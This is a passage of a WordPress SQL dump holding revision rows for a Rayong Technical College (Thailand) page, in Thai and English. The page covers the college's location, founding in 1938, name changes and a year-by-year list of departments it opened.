(3731, 3, '2018-08-14 11:21:20', '2018-08-14 04:21:20', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><b>ประวัติวิทยาลัยเทคนิคระยอง</b></span></h2>\r\n<h3><span style=\"color: #808080;\"><b>สถาน</b><b>ที่ตั้ง </b><b> </b>วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช</span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000</span></h3>\r\n<h3><span style=\"color: #ffffff;\">000000000<span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0</span>โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717</span></span></h3>\r\n<h3><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา</span></h3>\r\n<h3><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b> <i>เมื่อวันที่ 3 ตุลาคม 2481</i> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง <i>\"โรงเรียนช่างไม้ระยอง\" </i>ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จาก นายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน</span></h3>\r\n<h3><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b><i>ในปีพ.ศ.2501</i> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น <i>\"โรงเรียนการช่างไม้ระยอง\" </i>เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม <i>\"โรงเรียนการช่างไม้ระยอง\" </i>และ <i>\"โรงเรียนการช่างสตรีระยอง\" </i>เป็นโรงเรียนเดียวกัน ให้ชื่อว่า <i>\"โรงเรียนการช่างระยอง\" </i>และได้รับอนุมัติให้ชื่อเป็น <i>\"โรงเรียนเทคนิคระยอง\" </i>เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น <i>\"วิทยาลัยเทคนิคระยอง\" </i>ตั้งแต่วันที่ 1 พฤษภาคม 2523 จนถึงปัจจุบัน</span></h3>\r\n<h2><span style=\"color: #808080;\"><b>การจัดการศึกษา</b></span></h2>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2481</i></b> เปิดการสอนระดับอาชีวศึกษาชั้นต้น หลักสูตร 3 ปี รับผู้จบประโยคประถมศึกษา(ป.4) </span><span style=\"color: #808080;\">เข้าเรียนแผนกช่างไม้ และมีนักเรียนรุ่นแรก 34 คน </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2485</i></b><b> </b> เปิดสอนแผนกช่างตัดผม หลักสูตร 2 ปี แล้วยุบไป เพราะไม่มีนักเรียนสมัครเข้าเรียน </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2492</i></b><b> </b>เปิดสอนแผนกช่างตัดผมครั้งที่ 2 และขยายห้องเรียนแผนกช่างไม้ ปีที่ 1 เพิ่มเป็น 3 ห้องเรียน</span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2493 </i></b>ยุบแผนกช่างตัดผมเป็นครั้งที่ 2 </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2496 </i></b>ขยายการศึกษาถึงระดับมัธยมศึกษาตอนปลาย รับผู้จบชั้นมัธยมอาชีวศึกษาตอนต้นและรับผู้จบชั้นมัธยมปีที่ 3 สายสามัญ หลักสูตร 3 ปี แผนกช่างไม้ปลูกสร้าง </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2500 </i></b>เปิดสอนระดับมัธยมอาชีวศึกษาตอนปลาย แผนกช่างยนต์ </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2503 </i></b>เปิดสอนระดับอาชีวะชั้นสูง แผนกช่างไม้ปลูกสร้าง และยุบแผนกช่างยนต์ </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2506 </i></b>เปิดสอนแผนกช่างยนต์ครั้งที่ 2 เปิดสอนระดับมัธยมศึกษาตอนปลาย (ม.4-6) สายอาชีพ แผนกช่างก่อสร้าง </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2513 </i></b>เปิดสอนระดับมัธยมศึกษาตอนปลาย แผนกช่างเชื่อมโลหะแผ่น </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2519</i></b> เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างกลโรงงาน </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2520 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างไฟฟ้า </span></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px;\"><span style=\"color: #808080;\"><b><i>พ.ศ.2522 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกพณิชยการ </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2524 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.) สาขาเทคนิคอุตสาหกรรมปิโตรเคมี </span><span style=\"color: #808080;\">แผนกเทคนิคปฏิบัติการ เป็นหลักสูตร 2 ปี รับผู้จบมัธยมศึกษาตอนปลาย (มศ.5) สายวิทยาศาสตร์ </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2527</i></b> <b> </b>เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาการบัญชี สาขาเทคโนโลยี</span><span style=\"color: #808080;\">คหกรรมศาสตร์ และสาขาเทคนิคยานยนต์ </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2532 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.) สาขาเทคนิคเคมีอุตสาหกรรม</span><span style=\"color: #808080;\">เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) สาขาช่างอิเล็กทรอนิกส์ </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2533</i></b> เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาการตลาด และสาขาวิชาเครื่องมือวัดและควบคุมในอุตสาหกรรม </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2534</i></b> <b> </b>เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) ตามโครงการช่างฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรงแรม </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2535</i></b> <b> </b>เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาช่างอิเล็กทรอนิกส์ </span><span style=\"color: #808080;\">สาขางานอิเล็กทรอนิกส์อุตสาหกรรม เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) </span><span style=\"color: #808080;\">ตามโครงการฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรงแรม </span></h3>\r\n<h3><span style=\"color: #808080;\"><b><i>พ.ศ.2537</i></b> <b> </b>เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) 7 สาขา คือ สาขาวิชาช่างเทคนิค</span><span style=\"color: #808080;\">การผลิต สาขางานเครื่องกล สาขาช่างเทคนิคโลหะการ สาขางานเทคนิคงานเชื่อมอุตสาหกรรม สาขา</span><span style=\"color: #808080;\">วิชาช่างไฟฟ้ากำลัง สาขางานติดตั้งและควบคุม สาขาวิชาช่างก่อสร้าง สาขางานเทคนิคการก่อสร้าง สาขาวิชาคหกรรมธุรกิจ สาขาวิชาอาหารและโภชนาการ สาขาวิชาผ้าและเครื่องแต่งกาย</span></h3>\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-08-14 11:21:20', '2018-08-14 04:21:20', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3732, 3, '2018-08-14 11:26:06', '2018-08-14 04:26:06', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><b>ประวัติวิทยาลัยเทคนิคระยอง</b></span></h2>\r\n<h4><span style=\"color: #808080;\"><b>สถาน</b><b>ที่ตั้ง </b><b> </b>วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000</span></h4>\r\n<h4><span style=\"color: #ffffff;\">000000000<span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0</span>โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717</span></span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา</span></h4>\r\n<h4><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b> <i>เมื่อวันที่ 3 ตุลาคม 2481</i> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง <i>\"โรงเรียนช่างไม้ระยอง\" </i>ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จาก นายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน</span></h4>\r\n<h4><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b><i>ในปีพ.ศ.2501</i> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น <i>\"โรงเรียนการช่างไม้ระยอง\" </i>เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม <i>\"โรงเรียนการช่างไม้ระยอง\" </i>และ <i>\"โรงเรียนการช่างสตรีระยอง\" </i>เป็นโรงเรียนเดียวกัน ให้ชื่อว่า <i>\"โรงเรียนการช่างระยอง\" </i>และได้รับอนุมัติให้ชื่อเป็น <i>\"โรงเรียนเทคนิคระยอง\" </i>เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น <i>\"วิทยาลัยเทคนิคระยอง\" </i>ตั้งแต่วันที่ 1 พฤษภาคม 2523 จนถึงปัจจุบัน</span></h4>\r\n<h2><span style=\"color: #808080;\"><b>การจัดการศึกษา</b></span></h2>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2481</i></b> เปิดการสอนระดับอาชีวศึกษาชั้นต้น หลักสูตร 3 ปี รับผู้จบประโยคประถมศึกษา(ป.4) </span><span style=\"color: #808080;\">เข้าเรียนแผนกช่างไม้ และมีนักเรียนรุ่นแรก 34 คน </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2485</i></b><b> </b> เปิดสอนแผนกช่างตัดผม หลักสูตร 2 ปี แล้วยุบไป เพราะไม่มีนักเรียนสมัครเข้าเรียน </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2492</i></b><b> </b>เปิดสอนแผนกช่างตัดผมครั้งที่ 2 และขยายห้องเรียนแผนกช่างไม้ ปีที่ 1 เพิ่มเป็น 3 ห้องเรียน</span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2493 </i></b>ยุบแผนกช่างตัดผมเป็นครั้งที่ 2 </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2496 </i></b>ขยายการศึกษาถึงระดับมัธยมศึกษาตอนปลาย รับผู้จบชั้นมัธยมอาชีวศึกษาตอนต้นและรับผู้จบชั้นมัธยมปีที่ 3 สายสามัญ หลักสูตร 3 ปี แผนกช่างไม้ปลูกสร้าง </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2500 </i></b>เปิดสอนระดับมัธยมอาชีวศึกษาตอนปลาย แผนกช่างยนต์ </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2503 </i></b>เปิดสอนระดับอาชีวะชั้นสูง แผนกช่างไม้ปลูกสร้าง และยุบแผนกช่างยนต์ </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2506 </i></b>เปิดสอนแผนกช่างยนต์ครั้งที่ 2 เปิดสอนระดับมัธยมศึกษาตอนปลาย (ม.4-6) สายอาชีพ แผนกช่างก่อสร้าง </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2513 </i></b>เปิดสอนระดับมัธยมศึกษาตอนปลาย แผนกช่างเชื่อมโลหะแผ่น </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2519</i></b> เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างกลโรงงาน </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2520 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างไฟฟ้า </span></h4>\r\n<h4 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px;\"><span style=\"color: #808080;\"><b><i>พ.ศ.2522 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกพณิชยการ </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2524 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.) สาขาเทคนิคอุตสาหกรรมปิโตรเคมี </span><span style=\"color: #808080;\">แผนกเทคนิคปฏิบัติการ เป็นหลักสูตร 2 ปี รับผู้จบมัธยมศึกษาตอนปลาย (มศ.5) สายวิทยาศาสตร์ </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2527</i></b> <b> </b>เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาการบัญชี สาขาเทคโนโลยี</span><span style=\"color: #808080;\">คหกรรมศาสตร์ และสาขาเทคนิคยานยนต์ </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2532 </i></b>เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.) สาขาเทคนิคเคมีอุตสาหกรรม</span><span style=\"color: #808080;\">เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) สาขาช่างอิเล็กทรอนิกส์ </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2533</i></b> เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาการตลาด และสาขาวิชาเครื่องมือวัดและควบคุมในอุตสาหกรรม </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2534</i></b> <b> </b>เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) ตามโครงการช่างฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรงแรม </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2535</i></b> <b> </b>เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาช่างอิเล็กทรอนิกส์ </span><span style=\"color: #808080;\">สาขางานอิเล็กทรอนิกส์อุตสาหกรรม เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) </span><span style=\"color: #808080;\">ตามโครงการฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรงแรม </span></h4>\r\n<h4><span style=\"color: #808080;\"><b><i>พ.ศ.2537</i></b> <b> </b>เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) 7 สาขา คือ สาขาวิชาช่างเทคนิค</span><span style=\"color: #808080;\">การผลิต สาขางานเครื่องกล สาขาช่างเทคนิคโลหะการ สาขางานเทคนิคงานเชื่อมอุตสาหกรรม สาขา</span><span style=\"color: #808080;\">วิชาช่างไฟฟ้ากำลัง สาขางานติดตั้งและควบคุม สาขาวิชาช่างก่อสร้าง สาขางานเทคนิคการก่อสร้าง สาขาวิชาคหกรรมธุรกิจ สาขาวิชาอาหารและโภชนาการ สาขาวิชาผ้าและเครื่องแต่งกาย</span></h4>\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-08-14 11:26:06', '2018-08-14 04:26:06', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3733, 3, '2018-09-18 12:57:46', '2018-09-18 05:57:46', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h4><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> on the 3rd<sup> </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the </span><span style=\"color: #808080;\">1st<sup> </sup></span><span style=\"color: #808080;\">of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h4>\r\n<h2><strong><span style=\"color: #808080;\">Education Management </span></strong></h2>\r\n<h4><span style=\"color: #808080;\">In 1938 was the beginning of the vocational education and training for 3-years course for grade 4 graduates to study in the carpentry department. The first generation totaled 34 students. </span></h4>\r\n<h4><span style=\"color: #808080;\">In 1942 the Hairdresser department opened providing 2-years course, later this was cancelled due to the lack of students.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1949 the Hairdresser department was reopened and 3 more classrooms were built for 1st year students of carpentry. </span></h4>\r\n<h4><span style=\"color: #808080;\">In 1950 the Hairdresser department was shut down for the second time.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1953 Education expanded to senior high school level and for vocational junior high school graduates including grade 9 to enter the 3-year carpentry course.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1957 the mechanic department opened up to vocational senior high school.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1960 the carpentry department opened to high vocational education and the mechanic department was cancelled.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1963 the mechanic department opened for the second time and also opened up to grade 10-12 of a vocational education construction department.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1970 the sheet metal welder department opened up to senior high school.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1976 the machine shop department opened up to vocational certificate.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1977 the electric power department opened up to vocational certificate.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1979 the commercial department opened up to vocational certificate.</span></h4>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-autosave-v1', '', '', '2018-09-18 12:57:46', '2018-09-18 05:57:46', '', 3626, 'http://www.technicrayong.ac.th/3626-autosave-v1/', 0, 'revision', '', 0),
(3734, 3, '2018-08-14 11:29:05', '2018-08-14 04:29:05', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h4><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> on the 3<sup>rd </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the 1st of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h4>\r\n<h3></h3>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-08-14 11:29:05', '2018-08-14 04:29:05', '', 3626, 